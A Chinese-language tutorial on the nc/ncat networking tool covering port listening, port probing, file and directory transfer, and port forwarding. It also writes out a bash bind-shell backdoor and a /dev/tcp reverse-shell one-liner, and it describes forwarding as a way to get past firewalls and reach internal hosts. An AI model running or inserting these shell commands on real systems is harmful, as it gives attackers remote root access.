ncat/nc既是一个端口扫描工具,也是一款安全工具,还能是一款监测工具, 它可以用来在网络上读、写以及重定向数据。 同时它还能创建任意所需的连接,由于有这么多的功能,它被誉为是网络界的瑞士军刀。 每个运维人员都应该知道并且掌握它。

在CentOS 7/RHEL 7的最小化安装中,nc并不会默认被安装。 所以需要用下列命令手工安装。

[root@Linuxtechi ~]# yum -y install nmap-ncat

运维人员使用nc可以用来审计系统安全,用它来找出开放的端口然后保护这些端口。 还能用它作为客户端来审计Web服务器telnet服务器、邮件服务器等, 通过nc我们可以控制发送的每个字符,也可以查看对方的回应。

下面看几个nc常用例子。

1、监听入站连接

完整的命令是这样的:

[root@localhost ~]# ncat -l port_number

通过“-l”选项,ncat可以进入监听模式。指定该参数,则意味着nc被当作server,侦听并接受连接,而非向其它地址发起连接。

例如:

[root@localhost ~]# ncat -l 8080

服务器就会开始在8080端口监听入站连接。

2、使用nc探测端口状态

不同版本,nc的用法稍有不同,在CentOS6.x版本下,可以通过nc扫描系统中开放了哪些端口,例如:

[root@nnmaster ~]#   nc -nvz 172.16.213.155 80
Connection to 172.16.213.155 80 port [tcp/*] succeeded!

[root@nnmaster ~]#   nc -nvz 172.16.213.37 20-23
nc: connect to 172.16.213.37 port 20 (tcp) failed: Connection refused
nc: connect to 172.16.213.37 port 21 (tcp) failed: Connection refused
Connection to 172.16.213.37 22 port [tcp/*] succeeded!
nc: connect to 172.16.213.37 port 23 (tcp) failed: Connection refused

其中:

? ”-n“表示直接使用ip地址,而不通过域名服务器
? ”-v“输出更详细的指令执行结果。
? ”-z“使用0输入/输出模式,只在扫描通信端口时使用

而在CentOS7.x版本下,nc要探测端口的话,使用方法如下:

nc -w 3   IP地址    端口 < /dev/null && echo "tcp port ok"

其中,”-w“参数是表示超时秒数,后面跟数字。

例如:

[root@SparkMaster ~]# nc -w 3 172.16.213.170 8080 < /dev/null && echo "tcp port ok" 
tcp port ok

如果端口是通的,那么将返回“tcp port ok”,反之返回“Ncat: Connection refused“提示。同理,要探测udp端口状态,需要使用”-u“参数,例如:

nc -u -w 3 IP地址 端口 < /dev/null && echo "udp port ok"

3、通过nc进行文件、目录传输

nc还能用来在系统间拷贝文件,虽然这么做并不推荐,因为绝大多数系统默认都安装了ssh/scp。 不过如果恰好你遇见个没有ssh/scp的系统的话, 你可以用nc来作为后备。

首先,在A机器(从这个机器拷贝数据文件,ip为172.16.213.230)启动10000端口,进入监听模式,执行如下命令:

[root@localhost ~]# nc -l 10000 --send-only  < jdk1.8.0_171.tar.gz

接着,在B机器(拷贝文件到这台机器)执行如下命令:

[root@localhost ~]# nc -n 172.16.213.230 10000 --recv-only > jdk.tar.gz

jdk1.8.0_171.tar.gz是要发送的文件,jdk.tar.gz是传输到B机器上后的文件名。”-–send-only“选项会在文件拷贝完后立即关闭连接。 如果不加该选项,需要手工按下ctrl+c来关闭连接。同理,”–recv-only“是接收完毕后自动关闭连接。

发送一个文件很简单,但是如果我们想要发送多个文件,或者整个目录呢,是的,一样很简单,只需要使用压缩工具tar,压缩后发送压缩包即可,然后在接收端自动解压。

首先,在A机器(发送端,ip为172.16.213.230),要将prometheus目录发送到远程B主机,执行如下命令:

[root@localhost ~]# tar -cvf - prometheus | nc -l 10000 --send-only

接着,在B机器执行如下命令,将接收A机器传输过来的prometheus目录,并保存到B主机的当前目录下:

[root@localhost ~]# nc -n 172.16.213.230 10000 --recv-only | tar -xvf -

当然,也可以选择性的指定要发送的目录,例如要发送A机器上的/usr/local/nginx目录到B机器的/app目录下,可以执行如下命令:

在A机器执行:

[root@localhost ~]# tar -cvf - /usr/local/nginx | nc -l 10000 --send-only

在B机器执行:

[root@localhost ~]# nc -n 172.16.213.230 10000 --recv-only | tar -xvf - -C /app

这样执行后,A机器上的/usr/local/nginx目录就发送到了B机器的/app目录下了。

4、通过nc创建一个shell后 门

nc命令还可以用来在系统中创建后 门,并且这种技术已经被黑 客大量使用,为了保护我们的系统安全,我们需要知道它是怎么做的。

首先,在A服务器(172.16.213.230)上执行如下命令,创建后门:

[root@localhost local]# ncat -l -k 10000 -e /bin/bash

”-e“标志将一个bash与端口10000相连。也就是说,现在客户端只要连接到服务器上的10000端口就能通过bash获取我们系统的完整访问权限。

”-k“选项表示强制nc待命,当客户端从服务端断开连接后,过一段时间服务端也会停止监听。 但通过选项”-k“我们可以强制服务器保持连接并继续监听端口。

接着,在任意能访问172.16.213.230的10000端口的客户端上执行如下命令,即可直接登录172.16.213.230的系统。如下图所示:

[root@SparkMaster nginx]# ncat 172.16.213.230 10000
浏览器errconnectionrefused免费的adspower指纹浏览器插图

5、nc反向shell的应用

反向shell是指在客户端打开的shell。反向shell这样命名是因为不同于其他配置,这里服务器使用的是由客户提供的服务端口。

首先在远端任意一个客户端主机A(IP为172.16.213.231)监听一个端口,端口可以随意指定,这里指定一个20000端口:

[root@SparkMaster indices]# nc -l 20000

这样,20000在172.16.213.231主机上已经监听起来了。

接着,在另一个服务器B(ip地址为172.16.213.230)上执行如下命令:

[root@localhost local]# /bin/bash -i>& /dev/tcp/172.16.213.231/20000 0>&1 

现在回到A主机这个客户端上来,等待一分钟后,此终端会自动进入到shell命令行,注意看,这个进入的shell就是172.16.213.230主机了。

[root@SparkMaster indices]# nc -l 20000
[root@localhost ~]# ifconfig|grep eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.213.230  netmask 255.255.255.0  broadcast 172.16.213.255
        inet6 fe80::a00:27ff:feac:b073  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:ac:b0:73  txqueuelen 1000  (Ethernet)
        RX packets 17415571  bytes 20456663691 (19.0 GiB)
        RX errors 0  dropped 156975  overruns 0  frame 0
        TX packets 2379917  bytes 2031493944 (1.8 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

看到了吧,顺利进入B服务器了,还是root用户,接下来你想干什么,都行。这个反弹shell就是先入 侵B服务器,然后在客户端就可以操作B了。

最后,解释下上面植入的那个反弹shell和redis命令。先看这个反弹shell的内容:

/bin/bash -i>& /dev/tcp/172.16.213.231/20000 0>&1

首先,“bash -i”是打开一个交互的bash,这个最简单。

其次,/dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。

接着,“>&”其实和“&>”是一个意思,都是将标准错误输出重定向到标准输出。

最后,“0>&1”和“0<&1”也是一个意思,都是将标准输入重定向到标准输出中。

你要问这个0、1、2是什么意思吗,那我也解释下吧,在linux shell下,常用的文件描述符有如下三类:

(1)标准输入 (stdin) :代码为0,使用 < 或 << ;
(2)标准输出 (stdout):代码为1,使用 > 或 >> ;
(3)标准错误输出(stderr):代码为2,使用 2> 或 2>>。

好了,基础普及完了,说下上面这个反弹shell的意思吧。综上所述,这句反弹shell的意思就是,创建一个可交互的bash和一个到172.16.213.231:20000的TCP链接,然后将bash的输入、输出错误都重定向到172.16.213.231的20000监听端口上。其中,172.16.213.231就是我的客户端主机地址。

6、通过nc进行端口转发

为什么要端口转发呢?因为防火墙,或者外网访问内网的原因。比如防火墙不允许访问本机的3389端口怎么办,或者外网要想访问一台内网机器怎么办。这时端口转发可以很好的解决这些问题。

常见的应用场景有:

(1)对于防火墙禁止访问某些端口的问题,比如3306端口,我们可以将利用机器的其它端口,比如5000端口做端口转发,从外界接受数据,转发给本机的3306端口,从而绕过防火墙。

(2)对于无法访问内网特定机器的问题,我们可以先抓取内网一台机器,然后利用这台主机进行端口转发,接受外网的数据,将数据转发到内网目标机器的特定端口。

nc实现端口转发很简单,看一个例子:

我们通过选项”-c“来用nc进行端口转发,实现端口转发的语法为:

[root@localhost ~]# ncat -l  80  -c  'ncat -l 8080'

这样,所有连接到80端口的连接都会转发到8080端口。

下面是个具体应用案例,如下图所示:

浏览器errconnectionrefused免费的adspower指纹浏览器插图1

从上图可以看到,通过nc成功实现了端口转发请求,可见通过nc做端口转发非常简单。